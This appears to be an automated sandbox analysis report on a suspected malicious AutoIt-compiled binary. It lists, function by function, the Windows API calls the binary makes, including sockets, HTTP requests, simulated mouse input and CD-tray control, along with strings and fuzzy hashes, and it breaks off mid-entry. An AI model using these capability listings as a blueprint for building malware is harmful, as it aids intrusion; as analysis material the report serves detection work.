                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Color$Proc
                                                • String ID:
                                                • API String ID: 929743424-0
                                                • Opcode ID: 1f4d0e7cdb4bdcebfae6dd4dc661df6f327876d6921662a5d281460b313d446b
                                                • Instruction ID: 68a452a8c71d2469b85fb664d1ac6732953d23bd2fbd988eb577a2b662328a32
                                                • Opcode Fuzzy Hash: 1f4d0e7cdb4bdcebfae6dd4dc661df6f327876d6921662a5d281460b313d446b
                                                • Instruction Fuzzy Hash: 4B8148F4204464BAF63B663D8C99EBF155DDB46308F16811EF206D5ED2CA2DCE01D23A
                                                APIs
                                                  • Part of subcall function 003F39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003F39D7
                                                  • Part of subcall function 003F39AB: _wcslen.LIBCMT ref: 003F39F8
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003F21BA
                                                • WSAGetLastError.WSOCK32 ref: 003F21E1
                                                • bind.WSOCK32(00000000,?,00000010), ref: 003F2238
                                                • WSAGetLastError.WSOCK32 ref: 003F2243
                                                • closesocket.WSOCK32(00000000), ref: 003F2272
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 1601658205-0
                                                • Opcode ID: 4496150f0379646689bb7c22247d38c2d82bc29eef0b249b4277ff1dd4bd9f5d
                                                • Instruction ID: 395e9d0e9d2f8b69e751b7638104996e23fa9e2dc904e29f9b7ee5057f3c67b1
                                                • Opcode Fuzzy Hash: 4496150f0379646689bb7c22247d38c2d82bc29eef0b249b4277ff1dd4bd9f5d
                                                • Instruction Fuzzy Hash: 3C51C475A00204AFD721EF64C886F6A77E5AB44714F05C09CFA19AF3D3D774AD428BA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: fb0e6441e23745c5b9af9b45073bfecd3b83a6026e44cdf902dca0a7e44840c5
                                                • Instruction ID: ef295562923d7db8845fbdfedcfe68311c740295b3e66b3df3181408527d8bb4
                                                • Opcode Fuzzy Hash: fb0e6441e23745c5b9af9b45073bfecd3b83a6026e44cdf902dca0a7e44840c5
                                                • Instruction Fuzzy Hash: F121F6317002005FD7119F16CD58B177B95EF94314F18847AE849AB3D1DBBADC42CB98
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 003DEBDC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: c73e0df196e42ed09aaad7e9fdf42607525cde4a8181cc39f7cf01387ef28824
                                                • Instruction ID: ef3cfb1e51c1272f5d279dd4977662d6bbaffd2de62e68de38f16eac737aa6c3
                                                • Opcode Fuzzy Hash: c73e0df196e42ed09aaad7e9fdf42607525cde4a8181cc39f7cf01387ef28824
                                                • Instruction Fuzzy Hash: A4D017B719820178E81B2AB8AD2FF760E08E301751F46066BB203DDB94E4E5B900A126
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0037259A
                                                • GetSystemMetrics.USER32(00000007), ref: 003725A2
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003725CD
                                                • GetSystemMetrics.USER32(00000008), ref: 003725D5
                                                • GetSystemMetrics.USER32(00000004), ref: 003725FA
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00372617
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00372627
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0037265A
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0037266E
                                                • GetClientRect.USER32(00000000,000000FF), ref: 0037268C
                                                • GetStockObject.GDI32(00000011), ref: 003726A8
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 003726B3
                                                  • Part of subcall function 003719CD: GetCursorPos.USER32(?), ref: 003719E1
                                                  • Part of subcall function 003719CD: ScreenToClient.USER32(00000000,?), ref: 003719FE
                                                  • Part of subcall function 003719CD: GetAsyncKeyState.USER32(00000001), ref: 00371A23
                                                  • Part of subcall function 003719CD: GetAsyncKeyState.USER32(00000002), ref: 00371A3D
                                                • SetTimer.USER32(00000000,00000000,00000028,0037199C), ref: 003726DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 05c3ebba0cef704bccb90784eddb9873bc29523acb638526571e2e0e015ab12c
                                                • Instruction ID: 24e7316a1542ef50b5b3fd116fe6f9a6e58acd4bf534f487cce57de7e7a33c79
                                                • Opcode Fuzzy Hash: 05c3ebba0cef704bccb90784eddb9873bc29523acb638526571e2e0e015ab12c
                                                • Instruction Fuzzy Hash: C1B1BA75A00209AFDB15DFA8CD45BAE7BB4FB48314F018229FA19EB290DBB4D900CB55
                                                APIs
                                                • _wcslen.LIBCMT ref: 00408CB9
                                                • _wcslen.LIBCMT ref: 00408CCD
                                                • _wcslen.LIBCMT ref: 00408CF0
                                                • _wcslen.LIBCMT ref: 00408D13
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00408D51
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00403F79,?), ref: 00408DAD
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00408DE6
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00408E29
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00408E60
                                                • FreeLibrary.KERNEL32(?), ref: 00408E6C
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00408E7C
                                                • DestroyIcon.USER32(?), ref: 00408E8B
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00408EA8
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00408EB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                • String ID: .dll$.exe$.icl$y?@
                                                • API String ID: 799131459-1101282622
                                                • Opcode ID: 23b7e185b09102804edd2b40f47971d14620f77cfca06885ec8ca3fbafdc7f39
                                                • Instruction ID: 5127e08bb869c6af3cbe27571f6ef761d38680409d429fac127f2a1e050347fe
                                                • Opcode Fuzzy Hash: 23b7e185b09102804edd2b40f47971d14620f77cfca06885ec8ca3fbafdc7f39
                                                • Instruction Fuzzy Hash: FE61DE71900215BEEB149B64CD45FBF77A8AF08710F10862AFD55EA1D1DB789A80CBA4
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 003E4852
                                                • _wcslen.LIBCMT ref: 003E485D
                                                • _wcslen.LIBCMT ref: 003E48B4
                                                • _wcslen.LIBCMT ref: 003E48F2
                                                • GetDriveTypeW.KERNEL32(?), ref: 003E4930
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E4978
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E49B3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E49E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1839972693-4113822522
                                                • Opcode ID: 5cab4d9319f7d6eda180a9af836df26040f71a25b2532c6bfff77991210156d2
                                                • Instruction ID: 36243580d4744f5bf63c911af60c62da4989035e6521dd3f1644d6fdf6512c5a
                                                • Opcode Fuzzy Hash: 5cab4d9319f7d6eda180a9af836df26040f71a25b2532c6bfff77991210156d2
                                                • Instruction Fuzzy Hash: 457124715043619FC721EF25C88096BB7E4FF98364F118A2DF8959B291EB38DD45CB81
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 003D62BD
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003D62CF
                                                • SetWindowTextW.USER32(?,?), ref: 003D62E6
                                                • GetDlgItem.USER32(?,000003EA), ref: 003D62FB
                                                • SetWindowTextW.USER32(00000000,?), ref: 003D6301
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D6311
                                                • SetWindowTextW.USER32(00000000,?), ref: 003D6317
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003D6338
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003D6352
                                                • GetWindowRect.USER32(?,?), ref: 003D635B
                                                • _wcslen.LIBCMT ref: 003D63C2
                                                • SetWindowTextW.USER32(?,?), ref: 003D63FE
                                                • GetDesktopWindow.USER32 ref: 003D6404
                                                • GetWindowRect.USER32(00000000), ref: 003D640B
                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003D6462
                                                • GetClientRect.USER32(?,?), ref: 003D646F
                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 003D6494
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003D64BE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                • String ID:
                                                • API String ID: 895679908-0
                                                • Opcode ID: dea75eaecda768b9852158a894a4ad0a4de38c5b42e959d2768f81baf1e17483
                                                • Instruction ID: dff3bde46df60893fca08e1d6ec11d2c3d93af9d12b4db2af4e221bcdc35dd84
                                                • Opcode Fuzzy Hash: dea75eaecda768b9852158a894a4ad0a4de38c5b42e959d2768f81baf1e17483
                                                • Instruction Fuzzy Hash: F071BE32900705AFDB21DFA9DE46BAEBBF5FF48704F100929E196A36A0C775E944CB10
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 003F0784
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 003F078F
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003F079A
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 003F07A5
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 003F07B0
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 003F07BB
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 003F07C6
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 003F07D1
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 003F07DC
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 003F07E7
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 003F07F2
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 003F07FD
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 003F0808
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 003F0813
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 003F081E
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 003F0829
                                                • GetCursorInfo.USER32(?), ref: 003F0839
                                                • GetLastError.KERNEL32 ref: 003F087B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: c3eaa48707cd312a217e69e14a02429a2849415a1f47cf2b9167c0ca30255e56
                                                • Instruction ID: b38e1bef9ffa5a16b33670f64f30d434dc695cd645db5cbff284c9880e32cdfc
                                                • Opcode Fuzzy Hash: c3eaa48707cd312a217e69e14a02429a2849415a1f47cf2b9167c0ca30255e56
                                                • Instruction Fuzzy Hash: BA414670D043196ADB11DFBA8C8586EBFE8FF04754B50452AE11CEB291DA78D901CF91
                                                APIs
                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00390456
                                                  • Part of subcall function 0039047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0044170C,00000FA0,5E28F90F,?,?,?,?,003B2753,000000FF), ref: 003904AC
                                                  • Part of subcall function 0039047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003B2753,000000FF), ref: 003904B7
                                                  • Part of subcall function 0039047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003B2753,000000FF), ref: 003904C8
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003904DE
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003904EC
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003904FA
                                                  • Part of subcall function 0039047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00390525
                                                  • Part of subcall function 0039047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00390530
                                                • ___scrt_fastfail.LIBCMT ref: 00390477
                                                  • Part of subcall function 00390433: __onexit.LIBCMT ref: 00390439
                                                Strings
                                                • InitializeConditionVariable, xrefs: 003904D8
                                                • SleepConditionVariableCS, xrefs: 003904E4
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003904B2
                                                • WakeAllConditionVariable, xrefs: 003904F2
                                                • kernel32.dll, xrefs: 003904C3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 66158676-1714406822
                                                • Opcode ID: 9afa80551c048931d98ba4c331d8bb71f98ab68889fc9d94edfaa00c49beafde
                                                • Instruction ID: 8037d5550e031b2fd734862a7ffe7c49afe1f417384bf78fff7474a25fa0bc1f
                                                • Opcode Fuzzy Hash: 9afa80551c048931d98ba4c331d8bb71f98ab68889fc9d94edfaa00c49beafde
                                                • Instruction Fuzzy Hash: BA210B36E44310AFDF1A6BF8AD06B6977E4DF05B61F114136F901EA290DFB49C808E58
                                                APIs
                                                • CharLowerBuffW.USER32(00000000,00000000,0040DCD0), ref: 003E4E81
                                                • _wcslen.LIBCMT ref: 003E4E95
                                                • _wcslen.LIBCMT ref: 003E4EF3
                                                • _wcslen.LIBCMT ref: 003E4F4E
                                                • _wcslen.LIBCMT ref: 003E4F99
                                                • _wcslen.LIBCMT ref: 003E5001
                                                  • Part of subcall function 0038FD60: _wcslen.LIBCMT ref: 0038FD6B
                                                • GetDriveTypeW.KERNEL32(?,00437C10,00000061), ref: 003E509D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2055661098-1000479233
                                                • Opcode ID: 87c4e2930e26fd049c60ba50c00831b1cfbcb5eb11bb29c7b3cd690e519b0adc
                                                • Instruction ID: 35a81c4f4961060827351e2d26f36d9e0e89aef52676a65a0cd1ca7c037dd1f8
                                                • Opcode Fuzzy Hash: 87c4e2930e26fd049c60ba50c00831b1cfbcb5eb11bb29c7b3cd690e519b0adc
                                                • Instruction Fuzzy Hash: 86B125316083529FC721DF29C890A6AB7E5BF98724F118A1DF4968B2D2DB34DC45CB92
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0040DCD0), ref: 003F4A18
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003F4A2A
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0040DCD0), ref: 003F4A4F
                                                • FreeLibrary.KERNEL32(00000000,?,0040DCD0), ref: 003F4A9B
                                                • StringFromGUID2.OLE32(?,?,00000028,?,0040DCD0), ref: 003F4B05
                                                • SysFreeString.OLEAUT32(00000009), ref: 003F4BBF
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003F4C25
                                                • SysFreeString.OLEAUT32(?), ref: 003F4C4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 354098117-199464113
                                                • Opcode ID: 65a79fcf2d2869e24ccff68982bec8cf44513c4de0cfc76dbc488eaff45bca31
                                                • Instruction ID: 22925b0808ba69c506793ff60e75a91a82db3633008be061e1e0bdf9f94ddb02
                                                • Opcode Fuzzy Hash: 65a79fcf2d2869e24ccff68982bec8cf44513c4de0cfc76dbc488eaff45bca31
                                                • Instruction Fuzzy Hash: 63123D71A00109EFDB15CF94C984EBEBBB9FF45314F158098EA19AB261D731ED46CB90
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003ECE0D
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003ECE20
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003ECE34
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003ECE4D
                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003ECE90
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003ECEA6
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003ECEB1
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003ECEE1
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003ECF39
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003ECF4D
                                                • InternetCloseHandle.WININET(00000000), ref: 003ECF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                • String ID:
                                                • API String ID: 3800310941-3916222277
                                                • Opcode ID: 3d70ea5246491042eacef69055c05f799e77fef66282b34118131e72a1571a9a
                                                • Instruction ID: 5783089da32ddcc8e71dde30d4166cec3a8124d2b70ceaaf4cb9d8152f3de030
                                                • Opcode Fuzzy Hash: 3d70ea5246491042eacef69055c05f799e77fef66282b34118131e72a1571a9a
                                                • Instruction Fuzzy Hash: 0651AE70510248BFDB229FA5CD48AAF7BFDFF48744F004629F94696281D734E90ADBA0
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00408EF1
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00408F01
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00408F0C
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F19
                                                • GlobalLock.KERNEL32(00000000), ref: 00408F27
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408F36
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00408F3F
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F46
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F57
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00410C04,?), ref: 00408F70
                                                • GlobalFree.KERNEL32(00000000), ref: 00408F80
                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00408FA0
                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00408FD0
                                                • DeleteObject.GDI32(00000000), ref: 00408FF8
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0040900E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
